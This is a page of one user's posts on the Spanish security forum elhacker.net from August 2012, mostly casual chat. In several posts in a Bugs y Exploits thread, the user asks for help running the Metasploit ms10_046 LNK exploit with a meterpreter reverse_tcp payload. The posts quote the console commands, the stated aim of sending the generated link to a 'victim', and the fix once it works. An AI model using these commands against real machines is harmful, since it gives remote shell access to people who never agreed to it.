elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13
51  Seguridad Informática / Bugs y Exploits / Re: [Ayuda] Me salta error de permisos en metasploit en: 8 Agosto 2012, 13:23 pm
it3r hacía tiempo que no utilizaba el netcat, lo he vuelto a poner en escucha y llevas toda la razón, me salta este mensaje.

Citar
Can´t grab 0.0.0.0:80 with band

Tal y como tu y adastra habéis mencionado el problema es exáctamente que el puerto 80 está en uso por esos 2 procesos, vale simplemente quitándolo ya debe de funcionar.

Edito
Solucionado, el problema era ese, lo he probado y el exploit ya funciona. Muchas gracias por toda la ayuda compañeros! ;)
52  Programación / Programación C/C++ / Re: [Source] Calculadora Calc Don 1.0 en: 8 Agosto 2012, 04:08 am
Buenas, acabo de subir la calculadora con algunos cambios, no son muchos pero algo es algo, he tardado bastante por las vacaciones, no todo es trabajo.

Pd: Aún tengo que solucionar el tema de que sólo vaya con 16 bits y reordenar el código en distintas páginas. No me peguéis, estamos en verano  :xD
53  Seguridad Informática / Bugs y Exploits / Re: [Ayuda] Me salta error de permisos en metasploit en: 8 Agosto 2012, 02:09 am
Compañero gracias por la información, lo he probado con con el puerto 8081 y sus derivados pero por lo visto el SRVPORT sólo permite estar establecido en el 80, vamos que no puede cambiarse.

Tampoco deja modificarse el SRVHOST ni el LHOST ya que si coloco otra dirección que no sea mi IP local no va, da más errores que antes.

He mirado con el current ports que en el PC el puerto 80 (TCP) está siendo utilizado por 2 procesos del sistema, pero no creo que sea inconveniente el que se esté ejecutando para poder iniciar el exploit.
54  Foros Generales / Foro Libre / Re: Cuanto te duran las novias? en: 7 Agosto 2012, 21:33 pm
Algo habrás echo amigo para que dure tan poco, esque joder, ¿1 semana?, esto debería de entrar en el libro Winner de los récords  ;-)
55  Seguridad Informática / Bugs y Exploits / Re: [Ayuda] Me salta error de permisos en metasploit en: 7 Agosto 2012, 20:17 pm
Pues la consola al principio la ejecutaba como usuario normal pero al ver el problema la volví a ejecutar como administrador pero sin resultados, obtenía el mismo mensaje de error referente al permiso de administrador.

Lo único que intento ejecutar es esto...

Citar
search LNK
use windows/browser/ms10_046_shortcut_icon_dllloader
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set SRVHOST IP local mia
set LHOST IP local mia
show options
exploit

A partir de aquí se supone que debería de generar un enlace para enviárselo a la víctima...pero no lo genera.

El tema de ejecutarlo como administardor con lo típico del botón derecho no me da resultados. No sé si será otro fallo el que esté comentiendo, aunque el mensaje es claramnete referente al permiso del admin.
56  Seguridad Informática / Bugs y Exploits / [Solucionado] Me salta error de permisos en metasploit en: 5 Agosto 2012, 14:43 pm
Resulta que al ejecutar el exploit con su payload me salta un error que a simple vista parece que es porque no tengo los permisos necesarios para poder ejecutarlo.

Citar
exploit failed: Errno::EACCES permission denied - bind(2)

El exploit y el payload que uso son para tomar el control de la shell de windows 7, son estos.

Citar
use windows/browser/ms10_046_shortcut_icon_dllloader
set payload windows/meterpreter/reverse_tcp

No sé cúal es el motivo exacto ni como podría solucionarlo, espero que podáis echarme una mano.
57  Foros Generales / Noticias / Re: Un aficionado a las armas construye un rifle de asalto con una impresora 3D en: 5 Agosto 2012, 10:10 am
Bueno cyberboom99 se nota que estás muy enterado por todo lo que has viajado pero es que hay cosas más raraaaaas.

Citar
esta permitido tener armas en tu casa (tipo The Simpson, un ciudadano mentalmente inestable solo tiene derecho a tres armas jaja ) mas no es obligatorio... en Florida se puede comprar hasta un Rockelauncher :s  pero eso cobra muchas vidas inocentes como el reciente y lamentable acontecimiento en el estreno de Batman :(

Esto que has comentado me ha llamado la atención...persona inestable= 3 armas...si está inestable simpelmente no debería de dejarle comprar armas, y lo del lanzacohetes  :xD ¿esto es una broma? ¿pero que estamos en el GTA? Jajaj

PD: Si pone besitos puede suceder que sea gay, no te digo yo que no ajaja pero con el avatar morado como que ya da a conocer sus sexo  :silbar:
58  Seguridad Informática / Hacking Wireless / Re: Quitarme un pesado encima en: 5 Agosto 2012, 09:47 am
Citar
2312 mensajes en el foro y preguntas este tipo de cosas??
Me cuesta creerlo, pero bueno.
Jajaj también me di cuenta cuando iba a responderle, se supone que cuantos más mensajes como que tienes más experiencia y ya se ha pasado por cosas como estas pero bueno... se me hace raro  :-\
59  Foros Generales / Dudas Generales / Re: ¿Cual es el mejor hacker de la Historia para ti y porque? en: 5 Agosto 2012, 02:58 am
Kevin Mitnick, desde que me cargué la peli de Kevin Mitnick me encanta como hace las cosas este tipo, empezó desde los inicios de la informática y del phreaking y eso me gusta, aprender desde joven.

Runex y m0rf por lo visto no soy el único que pretendía ir a la campus party de Valencia, es verdad que ha sido una putada el tema del traslado pero al final nada de nada...era la primera vez que iba a ir pero al final se han chafado los planes.

Qué remedio...el próximo año será, me pillaré el coche de mi padre y a llevarme unas 6 horas conduciendo desde Sevilla a Valencia, que pesadez  :xD

Por cierto puntoinfinito tus app que tienes en tu web molan socio, veo que llevas bien el scripting, me han gustado. Otra cosa, te comenté en un video en youtube y me repondiste ajajaj me molo eso del código Melt, way  >:D

Saludos!
60  Foros Generales / Noticias / Re: Facebook y McAfee permiten blindar las fotos para que no sean descargadas ni ... en: 5 Agosto 2012, 02:48 am
Pues no se yo que decirles a estas compañías, actualmente en internet todo lo que tiene una censura, por así decirlo, al final acaba saliendo a la luz, vamos que con el tiempo si los usuarios quieren que la red siga siendo libre conseguirán la forma de evitar el futuro sistema que implementen.
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines